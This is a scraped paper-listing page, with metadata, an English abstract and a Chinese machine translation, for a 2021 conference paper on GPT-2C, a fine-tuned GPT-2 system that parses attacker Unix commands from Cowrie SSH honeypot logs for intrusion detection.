GPT-2C: a parser for honeypot logs using large pre-trained language models

Proceedings of the 2021 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining Pub Date : 2021-11-08 DOI:10.1145/3487351.3492723

Febrian Setianto, Erion Tsani, Fatima Sadiq, Georgios Domalis, Dimitris Tsakalidis, Panos Kostakos

{"title":"GPT-2C: a parser for honeypot logs using large pre-trained language models","authors":"Febrian Setianto, Erion Tsani, Fatima Sadiq, Georgios Domalis, Dimitris Tsakalidis, Panos Kostakos","doi":"10.1145/3487351.3492723","DOIUrl":null,"url":null,"abstract":"Deception technologies like honeypots generate large volumes of log data, which include illegal Unix shell commands used by latent intruders. Several prior works have reported promising results in overcoming the weaknesses of network-level and program-level Intrusion Detection Systems (IDSs) by fussing network traffic with data from honeypots. However, because honeypots lack the plug-in infrastructure to enable real-time parsing of log outputs, it remains technically challenging to feed illegal Unix commands into downstream predictive analytics. As a result, advances on honeypot-based user-level IDSs remain greatly hindered. This article presents a run-time system (GPT-2C) that leverages a large pre-trained language model (GPT-2) to parse dynamic logs generated by a live Cowrie SSH honeypot instance. After fine-tuning the GPT-2 model on an existing corpus of illegal Unix commands, the model achieved 89% inference accuracy in parsing Unix commands with acceptable execution latency.","PeriodicalId":320904,"journal":{"name":"Proceedings of the 2021 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining","volume":"44 1","pages":"0"},"PeriodicalIF":0.0000,"publicationDate":"2021-11-08","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":"13","resultStr":null,"platform":"Semanticscholar","paperid":null,"PeriodicalName":"Proceedings of the 2021 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining","FirstCategoryId":"1085","ListUrlMain":"https://doi.org/10.1145/3487351.3492723","RegionNum":0,"RegionCategory":null,"ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":null,"EPubDate":"","PubModel":"","JCR":"","JCRName":"","Score":null,"Total":0}

引用次数: 13

Abstract

Deception technologies like honeypots generate large volumes of log data, which include illegal Unix shell commands used by latent intruders. Several prior works have reported promising results in overcoming the weaknesses of network-level and program-level Intrusion Detection Systems (IDSs) by fussing network traffic with data from honeypots. However, because honeypots lack the plug-in infrastructure to enable real-time parsing of log outputs, it remains technically challenging to feed illegal Unix commands into downstream predictive analytics. As a result, advances on honeypot-based user-level IDSs remain greatly hindered. This article presents a run-time system (GPT-2C) that leverages a large pre-trained language model (GPT-2) to parse dynamic logs generated by a live Cowrie SSH honeypot instance. After fine-tuning the GPT-2 model on an existing corpus of illegal Unix commands, the model achieved 89% inference accuracy in parsing Unix commands with acceptable execution latency.

查看原文

微信好友朋友圈 QQ好友复制链接

本刊更多论文

GPT-2C:使用大型预训练语言模型的蜜罐日志解析器

蜜罐之类的欺骗技术会生成大量日志数据，其中包括潜在入侵者使用的非法Unix shell命令。一些先前的工作已经报告了克服网络级和程序级入侵检测系统(ids)的弱点的有希望的结果，通过混淆来自蜜罐的数据的网络流量。但是，由于蜜罐缺乏支持日志输出实时解析的插件基础设施，因此将非法Unix命令提供给下游预测分析仍然具有技术挑战性。因此，基于蜜罐的用户级入侵防御系统的进展仍然受到很大阻碍。本文介绍了一个运行时系统(GPT-2C)，它利用一个大型预训练语言模型(GPT-2)来解析由一个实时的Cowrie SSH蜜罐实例生成的动态日志。在现有的非法Unix命令语料库上对GPT-2模型进行微调后，该模型在解析Unix命令时达到了89%的推理准确率，并且执行延迟是可以接受的。

本文章由计算机程序翻译，如有差异，请以英文原文为准。

求助全文

约1分钟内获得全文去求助

来源期刊

Proceedings of the 2021 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining

自引率

0.00%

发文量